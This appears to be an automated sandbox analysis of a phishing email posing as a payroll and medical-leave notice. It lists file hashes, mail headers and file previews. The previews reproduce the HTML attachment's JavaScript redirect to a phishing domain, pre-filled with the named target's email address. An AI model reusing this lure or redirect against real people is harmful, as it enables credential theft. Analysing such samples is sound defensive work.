                                          Encrypted:false
                                          SSDEEP:
                                          MD5:6F204CDE947BF93D83F612779FEB6120
                                          SHA1:E7525B9D089AE6D980BB1ECF9611FB3E12BCA0AE
                                          SHA-256:0FB8575066293EF6F80E4790D89BD6EA2650CA90601E55F7E0B2EC873F6E821C
                                          SHA-512:39C67E690B001DEFA07414922765BED99BD5CE6CF01483363D05A6393CBBB1728B1A77362C6D29E30460A2F7A4062A98001FD29B5444715CF0C88A39571661F9
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2024-08-27T16:07:18">.. Build: 16.0.18014.40125-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://word-edit.officeapps.live.com/we/rrdiscovery.ashx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[

                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\8IYQW4LA\Employees_Payment_Amendment (002).htm:Zone.Identifier (copy)

                                          Download File
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):0
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:3684E397C181DFF483A36021B05E4D67
                                          SHA1:04AEDC0F5561A76C15B2371F07174E0A765FB4B6
                                          SHA-256:4D7C06EB7EBDA4F27ECEB8BFC78EC57BE1C81227790DFC43185B241A270AA726
                                          SHA-512:144B18CF024B964F16046A4A90AD58E0D5C22870AF23F782857909F60A360A8ED7E9ED96C3C2FA835E8B4F50F3D229B59B60EFABDE29E51E62C8CC8B99CEC41F
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:<html>..<head>..<title>Detail notification for Murexltd</title>..</head>..<body>..<SCRIPT LANGUAGE="JavaScript">.. ..self.location = 'https://designgallerias.com/Oiaduon30aDN0wXONyIN/#gjohnson@murexltd.com';..//-->..</SCRIPT>..</body>..</html>

                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\8IYQW4LA\Employees_Payment_Amendment.htm

                                          Download File
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):247
                                          Entropy (8bit):5.34185836252491
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:3684E397C181DFF483A36021B05E4D67
                                          SHA1:04AEDC0F5561A76C15B2371F07174E0A765FB4B6
                                          SHA-256:4D7C06EB7EBDA4F27ECEB8BFC78EC57BE1C81227790DFC43185B241A270AA726
                                          SHA-512:144B18CF024B964F16046A4A90AD58E0D5C22870AF23F782857909F60A360A8ED7E9ED96C3C2FA835E8B4F50F3D229B59B60EFABDE29E51E62C8CC8B99CEC41F
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:<html>..<head>..<title>Detail notification for Murexltd</title>..</head>..<body>..<SCRIPT LANGUAGE="JavaScript">.. ..self.location = 'https://designgallerias.com/Oiaduon30aDN0wXONyIN/#gjohnson@murexltd.com';..//-->..</SCRIPT>..</body>..</html>

                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\8IYQW4LA\Employees_Payment_Amendment.htm:Zone.Identifier

                                          Download File
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):26
                                          Entropy (8bit):3.95006375643621
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                          SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                          SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                          SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:[ZoneTransfer]..ZoneId=3..

                                          C:\Users\user\AppData\Roaming\Microsoft\Office\MSO3072.acl

                                          Download File
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:data
                                          Category:modified
                                          Size (bytes):30
                                          Entropy (8bit):1.2389205950315936
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:FC42BE62D9F6AAEAA33E407DB245E5AE
                                          SHA1:3C81C3FD0F893B92245B50C62C478F84CE001C57
                                          SHA-256:9C100CD3AE7FB7FB13DABA8EB679295E089F4987E4922D919BEEABDF0BEF119D
                                          SHA-512:8663DFC4CCD9CF7842AB6D5124EF80884FF55252B6F8125FCA47C8162B2BD6B47093F190A4BDE88C8B615E442A9E5C4888EB9A979130818C686E80882A38D164
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:..............................

                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Aug 27 15:07:26 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2677
                                          Entropy (8bit):4.003196370517185
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:6323C47807EC28832BFA24CFFDFB7DB0
                                          SHA1:F8C973C3EC36F3713DA1DF33752F20BDE6355735
                                          SHA-256:52FF55E35410996723F72375B8F5845B73E8CB3F7619C2323BFD8EAF13E60606
                                          SHA-512:AE39565EB19EE3D05EE584C718A49005DAF91139991B633548ADE367FC8E68C671C844ACE2E9B9E823015797E207A559FBED8A176B1F612ED908E3FB3007F6BD
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,....L..5........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Z.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Aug 27 15:07:26 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2679
                                          Entropy (8bit):4.017946966064173
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:70763A2A81464D0770CDF0E0F3F4BA71
                                          SHA1:6A0B44A86CA99D0329102F53F131E8E554DC5296
                                          SHA-256:9F80389376C7F4046BD0572C79FE566ABC317D5F789562BC2B69EB29135940D1
                                          SHA-512:948A8952DB5011068E8C9360891F3ED23CF7E35C01282929ACBA814C061356AB5D111867B117E061F40213BECD22B735B255AAA84CD1765C7DAF0D3145A55CAB
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,.....h.5........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Z.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2693
                                          Entropy (8bit):4.026471553591726
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:7DEFE200EAB439B674B5B5AE12210715
                                          SHA1:56F1F907A5A47D7C379C6CE7BBDDF3A92A11A094
                                          SHA-256:1CFF7DECD9E0305B6910BDAD67114743C6479D1A5806EE351C4626B532AFCBD0
                                          SHA-512:A6A9639DE214B92C57FA8A5A06A2F5746FD9330B71F193EFFE02403585C46CFFB6BF429323EC7DA5223FBF0B035DB58D2DDC70A967BF0CC3018041E205EEC98F
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Z.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Aug 27 15:07:26 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2681
                                          Entropy (8bit):4.015723546961491
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:D2151C24E4869431F82A35833B426E90
                                          SHA1:16104437BC8E761D83A2CBFAD1E08CBD1420DFB0
                                          SHA-256:D1F8D655E2E7ECDC1EFC575CCB110B6DD54F0FD7E1C9A16CAA28DD4B34F8BA9D
                                          SHA-512:958E58BD2B3F0FF6D847E7A522F9AEDCCED4925C5F39A780556F4A4DBB533101956AA3D89123FB6E2DBFB067CA6EBEC0773FE9858E73A8D6441BE12ABE8B0173
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,.....t.5........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Z.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Aug 27 15:07:26 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2681
                                          Entropy (8bit):4.007317530767082
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:64DB27776C7EDE93B074606470295705
                                          SHA1:C4F30FBB0B3E79363DFD12E061F3ED7AFC80530B
                                          SHA-256:3ABCB162501EC236AB60187874D0CAE6E3A4A40B555ADD58876A8875A7A1C477
                                          SHA-512:A65A635A52E81C23ECD11EF75714D7838F3D7DD985253345375E5FD6AE00BA1362876B77058A6617AC4A9973E395443D0396B222466B88FE47E5822E7D82E9B3
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,.......5........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Z.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Aug 27 15:07:26 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2683
                                          Entropy (8bit):4.01539267367978
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:9E56AEDED5AF90D5C869FF122191BEE0
                                          SHA1:3E4751F5A7337DDCEEFCD406EB86505BCF40EBE0
                                          SHA-256:877BF55C9C590F144C027ECC109366D56866CEBFEE63F739376DCEA6B1F210E7
                                          SHA-512:09B5EEC2D0809F82860A31ECF6F3604F67A25FBD2A575BE8F99E926C144EFE9C2D0CEF522DD425EC7483BC0BE84EE7E6CF956F39624BFA22B60F54FD429C6712
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,......y5........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Z.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                          Static File Info

                                          General

                                          File type:CDFV2 Microsoft Outlook Message
                                          Entropy (8bit):3.5931491952152883
                                          TrID:
                                          • Outlook Message (71009/1) 58.92%
                                          • Outlook Form Template (41509/1) 34.44%
                                          • Generic OLE2 / Multistream Compound File (8008/1) 6.64%
                                          File name:ocedures.msg
                                          File size:56'832 bytes
                                          MD5:9f3e44d62892eabb1442327ada8f0332
                                          SHA1:e365751b6e99a7c7629b752d5d1755bc805fbca1
                                          SHA256:1637dd7df01a9c28f85ff195cb4744150850b6935b2bfee9e248dae0b5f1accb
                                          SHA512:f9688e8f184f6aa76153b8fc376746946483df5a3a64bc8eae6b02be091533e5c27e8c28f72e4e1ab0efb29ebabf7cfbc567cf60cd8323f779f5ff041fa69b58
                                          SSDEEP:768:BzbjutXo6nzDqrB9dbQ4e2asm2tDNBLgyPPXo6nzDqrI3yT7V+1Mf5j5:9CtXoozDMMDneXoozDFyTQ1
                                          TLSH:4C438D2436FA4215F2B7EF3649F5909795377C92AD21CE4E2191330E0A72A41E9B1F3B
                                          File Content Preview:........................>......................................................................................................................................................................................................................................

                                          Static Mail

                                          General

                                          Subject:Please Read: Murexltd Employees New Payroll Amendment, Paid Medical Leave And Emergency Loan Procedures
                                          From:Murexltd Notification <support@mainet.ne.jp>
                                          To:Gordon Johnson <GJohnson@murexltd.com>
                                          Cc:
                                          BCC:
                                          Date:Fri, 23 Aug 2024 18:53:31 +0200
                                          Communications:
                                          • The information contained in this email and any attachments is confidential and intended solely for the use of the individual or entity to whom it is addressed. This email may contain confidential, privileged, or otherwise legally protected information. If you are not the intended recipient, you are hereby notified that any reading, dissemination, distribution, copying, or other use of this email or its attachments is strictly prohibited. If you have received this email in error, please notify the sender immediately by email and delete this email and all attachments from your system. By reading this email, you agree to the above terms and acknowledge that any breach of this confidentiality notice may result in legal action. Thank you for your cooperation.
                                          Attachments:
                                          • Employees_Payment_Amendment.htm

                                          Headers

                                          Key Value
                                          Receivedfrom [127.0.0.1] (unknown [4.172.205.76]) by smtp2.kagoya.net
                                          (260310b6:510:327::22) with Microsoft SMTP Server (version=TLS1_2,
                                          HTTPS; Fri, 23 Aug 2024 1653:40 +0000
                                          Aug 2024 1653:38 +0000
                                          Frontend Transport; Fri, 23 Aug 2024 1653:37 +0000
                                          id 15.20.7897.11 via Frontend Transport; Fri, 23 Aug 2024 1653:37 +0000
                                          mx-inbound40-106.us-east-2c.ess.aws.cudaops.com; Fri, 23 Aug 2024 1653:32
                                          24 Aug 2024 0153:32 +0900 (JST)
                                          Authentication-Resultsspf=softfail (sender IP is 209.222.82.130)
                                          Received-Spfpass (mx-inbound40-106.us-east-2c.ess.aws.cudaops.com: domain
                                          Content-Typemultipart/mixed;
                                          FromMurexltd Notification <support@mainet.ne.jp>
                                          ToGordon Johnson <GJohnson@murexltd.com>
                                          Subject=?UTF-8?B?UGxlYXNlIFJlYWQ6IE11cmV4bHRkIEVtcGxveWVlcyBOZXcgUGF5?=
                                          Message-Id<1fcad6b1-f144-bd90-22b5-e7f8d24d80a0@mainet.ne.jp>
                                          X-Priority1 (Highest)
                                          X-Msmail-PriorityHigh
                                          ImportanceHigh
                                          DateFri, 23 Aug 2024 16:53:31 +0000
                                          MIME-Version1.0
                                          X-Bess-Id1724432012-110346-12899-3583-1
                                          X-Bess-Ver2019.1_20240823.1304
                                          X-Bess-Apparent-Source-Ip153.127.234.4
                                          X-Bess-PartsH4sIAAAAAAACAz3LTQrCMBBA4bvMuosm82uvIi4mzYSCqIu2IIh3Nwvb3ePBd/
                                          X-Bess-Spam-StatusSCORE=0.50 using domain:184201 scores of
                                          X-Bess-Spam-Score0.50
                                          Authentication-Results-Originalmx-inbound40-106.us-east-2c.ess.aws.cudaops.com; spf=pass (sender IP is
                                          X-Bess-Spam-ReportCode version 3.2, rules version 3.2.2.258545 [from
                                          -------------------------------- 0.00 HTML_MESSAGE BODYHTML
                                          included in message 0.00 MIME_HTML_ONLY BODYMessage only has
                                          text/html MIME parts 0.50 ATTACH_EXT_DOT1 MIMEHEADERCustom Rule
                                          ATTACH_EXT_DOT1 0.00 MISSING_MIMEOLE METAMessage has
                                          X-Bess-Brts-Status1
                                          Return-Pathsupport@mainet.ne.jp
                                          X-Ms-Exchange-Organization-Expirationstarttime23 Aug 2024 16:53:37.5542
                                          X-Ms-Exchange-Organization-ExpirationstarttimereasonOriginalSubmit
                                          X-Ms-Exchange-Organization-Expirationinterval1:00:00:00.0000000
                                          X-Ms-Exchange-Organization-ExpirationintervalreasonOriginalSubmit
                                          X-Ms-Exchange-Organization-Network-Message-Ida62a00fe-034d-4c4e-4fc4-08dcc394222a
                                          X-Eopattributedmessage0
                                          X-Eoptenantattributedmessaged5ea0ba6-3c9e-43c2-9d1e-fffeb0d842e5:0
                                          X-Ms-Exchange-Organization-MessagedirectionalityIncoming
                                          X-Ms-PublictraffictypeEmail
                                          X-Ms-TraffictypediagnosticSN1PEPF000397B2:EE_|DM6PR16MB3733:EE_|PH7PR16MB6043:EE_
                                          X-Ms-Exchange-Organization-AuthsourceSN1PEPF000397B2.namprd05.prod.outlook.com
                                          X-Ms-Exchange-Organization-AuthasAnonymous
                                          X-Ms-Office365-Filtering-Correlation-Ida62a00fe-034d-4c4e-4fc4-08dcc394222a
                                          X-Ms-Exchange-Organization-Scl-1
                                          X-Ipw-GroupmemberFalse
                                          X-Microsoft-AntispamBCL:0;ARA:13230040|19003399015;
                                          X-Forefront-Antispam-ReportCIP:209.222.82.130;CTRY:US;LANG:en;SCL:-1;SRV:;IPV:NLI;SFV:NSPM;H:outbound-ip121a.ess.barracuda.com;PTR:outbound-ip121a.ess.barracuda.com;CAT:NONE;SFS:(13230040)(19003399015);DIR:INB;
                                          X-Ms-Exchange-Crosstenant-Originalarrivaltime23 Aug 2024 16:53:37.3823
                                          X-Ms-Exchange-Crosstenant-Network-Message-Ida62a00fe-034d-4c4e-4fc4-08dcc394222a
                                          X-Ms-Exchange-Crosstenant-Idd5ea0ba6-3c9e-43c2-9d1e-fffeb0d842e5
                                          X-Ms-Exchange-Crosstenant-AuthsourceSN1PEPF000397B2.namprd05.prod.outlook.com
                                          X-Ms-Exchange-Crosstenant-AuthasAnonymous
                                          X-Ms-Exchange-Crosstenant-FromentityheaderInternet
                                          X-Ms-Exchange-Transport-CrosstenantheadersstampedDM6PR16MB3733
                                          X-Ms-Exchange-Transport-Endtoendlatency00:00:02.7423590
                                          X-Ms-Exchange-Processed-By-Bccfoldering15.20.7897.007
                                          X-Microsoft-Antispam-Mailbox-Deliveryucf:0;jmr:0;auth:0;dest:I;ENG:(910001)(944506478)(944626604)(920097)(930097)(140003);
                                          X-Microsoft-Antispam-Message-InfobZ8PLupZsdrxc4wLF1ryzDCoOPvQHfXpckGA8Kj2G47ESQBDyTPwmG32nkx9QN3KF3lUCuKgHVrn8iu4vS99oD+Z1zvdLNRfjxCwvWk57WU+mXrE/pPas53oHANrNAF8LVONu1flHEsfd5CIUfjyvpAw2kDsYFidpvEtPR99Vksi8/kPLVKrEtj9xpRAekPj+D85sy/vc3ymuyp68hN6JESD3FctIXRuSzPh4uYV6LGxXqSs29xJ7bQKYzclZA2XRT9mAnQMRY5Szi46RRPe6CgChvQuehIGaVPjOCMhLiLaWB09r+c0UqnHlIlkJJglBnL4ATR+6Oob3Op85iH5zWE4VNlW8o4eeGTTm+WvjGgjtLzpWoxPlPL8W3I7nrfqVHrGYYCbjQdRdkVHPPFjs6Fi8yivOCPEA5I3cyTtxyQJz43tKgIB5gkKxwBEiRXuxzqMP82/6rFFbrvbGG7VVzpBv7vX5vpOY76/mGNKM4Rx+ROwpGAa01dNQaY3eFr53fWKFer8ifkAPvbu7NdvaK9Aoj1Rrv5mNEXttULgACma5WvjuK+TOcT4ZCn7zZI9fGf5oMi7OKYZqQnGkZNmzTyOLmaos1o3mZFtXHGmio4FyAf7e7gXq2F2o/bBHp0ciWX5YqAM3wHTOzY0NR3DV5Qw5eLUPV8W6zGwsl1uY679Ax2fMgUy/5EM0uZ5mZ/3eIilOd3FxyN+l9kk1Mwl2oBburFg6KoegF+EfGomSGEe15djWV3MDJjGZSy0bcJTw8A4j+lndcfQf0Sz4p33X/UVx/65OFeu5GLBPxbEB8UkPQWoQTRpZFakY+S9sb/XM21zUZNDeADYxlnzpiI+rBhFuKwwf5pyUR30DBhe1/3Xj2SHWM+PZw1rdWucypKB506TPaAyQFSxxTVspPK1Ht9j2usErQXvjvc3guhFE1axW/sFiTZXS9u6Q15I7eMvtdJMvxGJOuBXIjT9lsWafoFw3TZnRiyzVwPxx6FKG70KiySr5e5NvpRCAQUAhV4+/nZZjexFZ6DsuTM6JOxICqKKQjiIm69AuAf4g8zngCcD2EM72TRupFFW3v8gqJki9sKdElN3qabDQtAfV2xyjLlXqrC+7eC4eOs3LAFDCURstbpTRQgFcHuZUYcqY3MquMnkoTYPM/jf9XMETs5ztGj5cb1QyvIesUoBQd57Ja1hYQtzStL3iDGPFIfc4ssQGCNjTXnooKjtsPtOWYnxPkBiQesD/3wEJbhD2D4dOMOeOybz3bvahJHjUH8B6tjcrUIX9HAu+YY6WdtbETldKyGFFyPecWLBMoDLcLepY5qhUpRNKltRJEtirdbeGuiIEiTx3ChkUlax6HxjPYkrrcgE8u37mLx0zMhgAObnsehBZsOD58LpPhZKDV9i7S9Qk62E+jhLdteL1dBZZWwYHNdQ/7P0NUfbwRmzVebXAXCbM+C+VXh6Tji0isztTHn5zx4mDll/sWUnctduafgD4Q3745FlOmmwk4ileEWILKPHxTwPjaYYYZFrw2n29+otKuD7bpg1LFtb/b3/kPrFRqPUvgUbheO57O/wDYUuQ66GRay1HXcfCY0m7t++6HHNfsgk+ApKzliLaAX1uCWqEVTRce/XDO8J/I71IaAM29/tW+ewPzoMIJkaS1WiO5b32P938T83LIJWFg9BUV0lX2CsKWGKvgJbxcNsc9kDz+Ulit6HNJF9yTxzaAhQeIm+hB6hw+DPWC5BgclZd2iYGUOYr/N3Emb9JGC1pqT+hGkQ/3f61KZDcWBbiJ4Tyxj5YlPNtOERjHnZrpHB3jKsITuYfeCpL6gEjoLF+BCL7vq2UA+TTTmt5OIxk12djeDyGV1L9M48LOTeDW7pzyu0buQDxoXt/3k1i0yriIIqNPVOrl8sl7vxoPaLyIkSZ7ymItCr2SgZ5ZTr0785lxnw